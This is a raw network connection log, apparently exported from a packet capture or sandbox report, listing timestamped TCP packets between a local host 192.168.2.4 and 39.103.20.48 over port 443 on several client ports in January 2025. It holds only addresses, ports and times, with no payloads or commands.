Jan 7, 2025 04:22:01.052104950 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.052160025 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.052228928 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.052272081 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.053030968 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.053081989 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.273531914 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.273581028 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.273607969 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.273628950 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.273658991 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.273673058 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.273844004 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.273894072 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.273953915 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.274000883 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.274096966 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.274144888 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.274840117 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.274902105 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.274995089 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.275037050 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.275043011 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.275052071 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.275089025 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.275849104 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.275876999 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.275912046 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.275921106 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.275930882 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.275958061 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.276619911 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.276698112 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.276717901 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.276767015 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.277472973 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.277525902 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.277612925 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.277662992 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.496129990 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.496193886 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.496298075 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.496355057 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.496423006 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.496474028 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.496732950 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.496784925 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.497014999 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.497064114 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.497148037 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.497199059 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.497277975 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.497323990 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.497689962 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.497730970 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.497745037 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.497754097 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.497771978 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.497777939 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.497781992 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.497807026 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.497818947 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.497848988 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.498614073 CET	49737	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.498631954 CET	443	49737	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.536106110 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.536142111 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:01.536211014 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.536509037 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:01.536520004 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:02.775129080 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:02.775198936 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:02.775685072 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:02.775693893 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:02.775861979 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:02.775865078 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.120033979 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.120050907 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.120115042 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.120129108 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.120172024 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.120570898 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.120628119 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.122039080 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.122106075 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.125926971 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.125988960 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.210458040 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.210490942 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.210514069 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.210521936 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.210540056 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.210561991 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.210994959 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.211059093 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.211729050 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.211787939 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.211900949 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.211965084 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.212755919 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.212825060 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.214531898 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.214600086 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.214940071 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.215001106 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.216526985 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.216588020 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.300976038 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.301013947 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.301044941 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.301052094 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.301079988 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.301094055 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.301278114 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.301321030 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.301651001 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.301697969 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.301753044 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.301800966 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.302059889 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.302094936 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.302115917 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.302119970 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.302130938 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.302158117 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.302783966 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.302836895 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.302856922 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.302900076 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.302937984 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.302983046 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.303486109 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.303536892 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.303755999 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.303805113 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.304035902 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.304090023 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.305798054 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.305850983 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.307065964 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.307101011 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.307122946 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.307126999 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.307138920 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.307157993 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.391407013 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.391505003 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.391560078 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.391613960 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.391617060 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.391658068 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.392355919 CET	49738	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.392365932 CET	443	49738	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.436156988 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.436201096 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:03.436288118 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.436487913 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:03.436501026 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:04.665358067 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:04.665438890 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:04.665940046 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:04.665950060 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:04.666137934 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:04.666145086 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.007520914 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.007545948 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.007606983 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.007623911 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.007637024 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.007666111 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.008061886 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.008111000 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.009211063 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.009257078 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.009268999 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.009298086 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.009413958 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.009428024 CET	443	49739	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.009438038 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.009480953 CET	49739	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.020513058 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.020540953 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:05.020636082 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.020827055 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:05.020842075 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.278702974 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.278981924 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.279437065 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.279447079 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.279617071 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.279624939 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.673113108 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.673134089 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.673357964 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.673377037 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.673427105 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.673749924 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.673801899 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.674860954 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.674909115 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.678608894 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.678666115 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.765471935 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.765638113 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.765866995 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.765917063 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.766062021 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.766113043 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.766904116 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.766938925 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.766947031 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.766958952 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.766976118 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.766999960 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.767930984 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.767976999 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.769181013 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.769232988 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.769342899 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.769390106 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.771187067 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.771236897 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.858001947 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.858043909 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.858081102 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.858091116 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.858124018 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.858144999 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.858182907 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.858231068 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.858290911 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.858347893 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.858408928 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.858464956 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.858995914 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.859041929 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.859180927 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.859230995 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.859318972 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.859358072 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.859384060 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.859390974 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.859400988 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.859432936 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.860028982 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.860080004 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.860250950 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.860301018 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.860399008 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.860440969 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.860481024 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.860527039 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.861682892 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.861732960 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.863567114 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.863641024 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.907356977 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.907416105 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.950345039 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.950418949 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.950459003 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.950510979 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.950623989 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.950666904 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.950824976 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.950880051 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.951028109 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.951078892 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.951271057 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.951327085 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.951339006 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.951385021 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.951487064 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.951529980 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.951581001 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.951623917 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.951934099 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.951981068 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.951997042 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.952039003 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.952224016 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.952267885 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.952271938 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.952280045 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.952297926 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.952311039 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.952330112 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.952336073 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.952363968 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.952374935 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.952536106 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.952581882 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.952857018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.952905893 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.953043938 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.953090906 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.961714983 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.961752892 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.961786032 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.961793900 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.961817980 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.961829901 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.961992979 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962033987 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962043047 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.962049007 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962075949 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962081909 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.962088108 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962117910 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.962141037 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.962318897 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962347984 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962373018 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.962378979 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962403059 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.962410927 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.962533951 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962588072 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.962726116 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.962774992 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.963593960 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.963641882 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:06.967436075 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:06.967482090 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.042790890 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.042829990 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.042841911 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.042850018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.042876005 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.042893887 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.042984962 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.043031931 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.043096066 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.043139935 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.043239117 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.043277979 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.043394089 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.043437004 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.043510914 CET	443	49740	39.103.20.48	192.168.2.4
